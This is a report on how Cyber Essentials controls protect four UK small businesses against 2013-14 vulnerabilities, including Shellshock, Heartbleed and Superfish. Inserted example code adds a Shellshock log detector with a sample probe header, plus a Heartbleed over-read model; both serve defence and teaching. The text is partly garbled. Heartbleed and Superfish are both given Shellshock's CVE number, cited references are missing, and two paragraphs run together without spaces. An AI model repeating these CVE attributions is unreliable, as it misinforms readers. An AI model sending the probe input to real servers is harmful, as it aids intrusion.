Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Despite any level of security tools being deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or if there are more suitable and potentially more secure solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site, a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides both local HTTP access to the database it runs, as well as having firewall rules in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.


User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS, mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials, then the services they use must also not have, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these, it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.

Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.

Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix."

CVE-2014-6271[13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
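The last point, that an SME might have no idea it had been probed, is where monitoring helps: the CVE text above names the mechanism (a value beginning with a Bash function definition arriving through an environment variable that a CGI gateway populates from request headers), and that prefix has no legitimate place in an HTTP header, so it is a usable log signature. The following detector is an added example, not code from the report; the log format is the common Apache/nginx "combined" format, and the log lines, addresses and the /cgi-bin/status path are constructed for the example.

```python
"""Added example, not from the Security Lancaster report: a detector for
Shellshock-style probes in web server access logs. It matches the Bash
function-definition prefix "() {" named in the CVE description, in the
fields a CGI gateway copies into a child's environment. Sample log lines,
addresses and paths are constructed for this example."""
import re
from typing import Dict, List, Optional

# Bash exports functions as environment values beginning with "() {".
# A probe places that prefix in a request field that the CGI server turns
# into an environment variable, so the prefix itself is the signature.
FUNCTION_PREFIX = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format; a missing Referer or User-Agent is "-".
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Fields that become HTTP_USER_AGENT, HTTP_REFERER and QUERY_STRING /
# REQUEST_METHOD in a CGI child's environment.
ENV_EXPOSED_FIELDS = ("agent", "referer", "request")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line.strip())
    return m.groupdict() if m else None


def shellshock_indicators(entry: Dict[str, str]) -> List[str]:
    """Names of the fields in one parsed entry that carry the function prefix."""
    return [f for f in ENV_EXPOSED_FIELDS if FUNCTION_PREFIX.search(entry[f])]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run the signature over log lines; return one finding per suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        entry = parse_combined(line)
        if entry is None:
            continue  # unparseable line: skipped here, worth counting in real use
        hits = shellshock_indicators(entry)
        if hits:
            findings.append({
                "line": lineno,
                "ip": entry["ip"],
                "request": entry["request"],
                "fields": hits,
            })
    return findings


# Constructed sample: two ordinary requests and one probe carrying the
# prefix in its User-Agent against a (hypothetical) CGI path.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:09 +0100] "GET /cgi-bin/status HTTP/1.1" 200 312 "-" "() { :;}; echo probe"',
    '203.0.113.5 - - [25/Sep/2014:10:01:15 +0100] "GET /about.html HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['request']!r} via {', '.join(f['fields'])}")
```

A hit tells the defender which hosts were probed and through which field, which is the evidence needed to check whether the CGI handler on that path ever ran bash and whether the bash package was patched at that time; it does not by itself show that the probe succeeded.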

"Heartbleed"

Appearing in April 2014, the CVE-2014-6271 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug."

CVE-2014-6271[12]
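The "buffer over-read" the report describes comes down to one missing bounds check: a heartbeat message declares its own payload length, and an unpatched decoder echoed that many bytes back without confirming the bytes were actually in the received message. The model below is an added example, not code from the report or from OpenSSL; the message layout (a type byte, a 16-bit payload length, the payload, at least 16 bytes of padding) follows the TLS heartbeat extension, the bounds check mirrors the one the fix introduced, and the function names and sample bytes are our own.

```python
"""Added example, not from the report or from OpenSSL: a model of the TLS
heartbeat length check whose absence was the Heartbleed bug. The layout
(type, 16-bit payload length, payload, >= 16 bytes padding) follows the TLS
heartbeat extension; all names and sample bytes are constructed here."""
import struct
from typing import Optional, Tuple

HB_REQUEST = 1
HB_RESPONSE = 2
HEADER_LEN = 1 + 2      # type byte + 2-byte payload length
MIN_PADDING = 16        # heartbeat messages carry at least 16 bytes of padding


class MalformedHeartbeat(ValueError):
    pass


def build_heartbeat(hb_type: int, payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Encode a heartbeat message. declared_len lets a test construct a
    malformed message whose length field disagrees with the bytes sent."""
    if declared_len is None:
        declared_len = len(payload)
    return struct.pack("!BH", hb_type, declared_len) + payload + b"\x00" * MIN_PADDING


def parse_heartbeat(record: bytes) -> Tuple[int, bytes]:
    """Decode a heartbeat message, enforcing the bound the fix added: header,
    declared payload and minimum padding must all fit inside the record."""
    if len(record) < HEADER_LEN + MIN_PADDING:
        raise MalformedHeartbeat("record shorter than header plus padding")
    hb_type, payload_len = struct.unpack("!BH", record[:HEADER_LEN])
    if HEADER_LEN + payload_len + MIN_PADDING > len(record):
        raise MalformedHeartbeat("declared payload length exceeds record")
    return hb_type, record[HEADER_LEN:HEADER_LEN + payload_len]


def unchecked_echo(memory: bytes) -> bytes:
    """Model of the unpatched behaviour. `memory` stands in for the process
    heap: the received record sits at offset 0 and unrelated data follows it.
    The echo trusts payload_len and copies that many bytes from the payload
    start, so bytes that were never part of the record are returned."""
    _, payload_len = struct.unpack("!BH", memory[:HEADER_LEN])
    return memory[HEADER_LEN:HEADER_LEN + payload_len]


def checked_echo(memory: bytes, record_len: int) -> Optional[bytes]:
    """Patched behaviour: decode only the bytes actually received and silently
    discard the message (return None) when its length field is inconsistent."""
    try:
        hb_type, payload = parse_heartbeat(memory[:record_len])
    except MalformedHeartbeat:
        return None
    if hb_type != HB_REQUEST:
        return None
    return build_heartbeat(HB_RESPONSE, payload)


if __name__ == "__main__":
    good = build_heartbeat(HB_REQUEST, b"ping")
    bad = build_heartbeat(HB_REQUEST, b"hi", declared_len=40)
    # Constructed stand-in for whatever happened to follow the record in memory.
    heap = bad + b"SECRET-KEY-MATERIAL"
    print(parse_heartbeat(good))
    print(unchecked_echo(heap))          # includes bytes from beyond the record
    print(checked_echo(heap, len(bad)))  # None: inconsistent message discarded
```

Python slicing cannot read past the end of a bytes object, so `unchecked_echo` only shows the effect when the neighbouring data is placed in the same buffer; in the C implementation the copy ran into whatever the process heap held. The point for a patch-management control is that nothing in the message format itself prevents the over-read, so only the corrected library version (1.0.1g onward, per the CVE text) removes the exposure.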

As OpenSSL is a core part of many applications and services, both in the open- and closed-source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft[15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.

"Superfish"

"The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products."

CVE-2014-6271[14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software, essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves[11], and is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.

Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention: not least malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for

such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations

There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities

An important note to be made concerns the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The controls currently in widest use could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls, whereas patch management is not necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and, as such, is vital to an organisation's cyber-safety.
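The per-control proportions discussed above can be derived from the report's "Cyber Controls Applicability" table. The following Python is an added example, not code from the report: it scores a small constructed sample of rows transcribed from that table, normalises the table's wording onto the five Cyber Essentials controls (an assumed mapping), and reports each control's share of the listed vulnerabilities together with per-SME coverage.

```python
"""Scoring rows of a Cyber Essentials (CE) applicability table.

Added example, not code from the report. The rows below are a small
constructed sample transcribed from the report's "Cyber Controls
Applicability" table, in its column order: CVE, applicability to SME1..SME4,
Idealised, status with No CE, status With CE, and the controls involved.
The mapping of table wording onto the five CE controls is an assumption
made here; the report does not publish its own scoring script.
"""
from collections import Counter
from fractions import Fraction

# Constructed sample (';' separates the controls named for one CVE).
SAMPLE_TABLE = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall; Secure Configuration (User Policy); Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management; Secure Configuration (Secure Browser); Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall; Secure Configuration; Patch Management; Anti-Malware
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware
"""

# Table wording -> one of the five CE controls (assumed mapping).
CE_CONTROLS = {
    "firewall": "Boundary Firewalls",
    "boundary firewalls": "Boundary Firewalls",
    "secure configuration": "Secure Configuration",
    "access control": "Access Control",
    "access policy": "Access Control",
    "user access": "Access Control",
    "strong password": "Access Control",
    "strong passwords": "Access Control",
    "anti-malware": "Malware Protection",
    "malware protection": "Malware Protection",
    "patch management": "Patch Management",
}


def normalise_control(name):
    """Map a cell such as 'Secure Configuration (Secure Browser)' to a CE
    control; measures outside CE (website blacklisting, firmware updates,
    anti-DoS, SSL) become 'Other'."""
    base = name.split("(")[0].strip().lower()
    return CE_CONTROLS.get(base, "Other")


def parse_rows(text):
    """Parse pipe-separated rows; lines without nine cells are skipped."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 9 or not cells[0].startswith("CVE-"):
            continue
        rows.append({
            "cve": cells[0],
            "applicable": [c == "y" for c in cells[1:5]],   # SME1..SME4
            "idealised": cells[5] == "y",
            "no_ce": cells[6],
            "with_ce": cells[7],
            "controls": sorted({normalise_control(c) for c in cells[8].split(";")}),
        })
    return rows


def control_share(rows):
    """Share of the listed CVEs that each control helps mitigate (fully or
    partially). A row whose With-CE status is 'Not Mitigated' counts for
    nothing even though a control is named: the named measure (e.g. 'don't
    install') lies outside what CE certifies."""
    counts = Counter()
    for row in rows:
        if row["with_ce"] == "Not Mitigated":
            continue
        for control in row["controls"]:
            counts[control] += 1
    return {control: Fraction(n, len(rows)) for control, n in counts.items()}


def status_summary(rows):
    """How many CVEs are Mitigated / Partially Mitigated / Not Mitigated with CE."""
    return Counter(row["with_ce"] for row in rows)


def sme_coverage(rows, sme):
    """For SME 1-4: (applicable CVEs, fully mitigated by CE, partially)."""
    applicable = [r for r in rows if r["applicable"][sme - 1]]
    full = sum(r["with_ce"] == "Mitigated" for r in applicable)
    partial = sum(r["with_ce"] == "Partially Mitigated" for r in applicable)
    return len(applicable), full, partial


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_TABLE)
    for control, share in sorted(control_share(rows).items(), key=lambda kv: -kv[1]):
        print(f"{control:<22} {float(share):5.1%}")
    print(dict(status_summary(rows)))
    for sme in range(1, 5):
        print(f"SME{sme}: applicable/full/partial = {sme_coverage(rows, sme)}")
```

Run against the full table the same functions give the report-wide shares; on this eight-row sample Patch Management already comes out highest, as the section states.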

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats should be carried out to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 12 of 28

References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

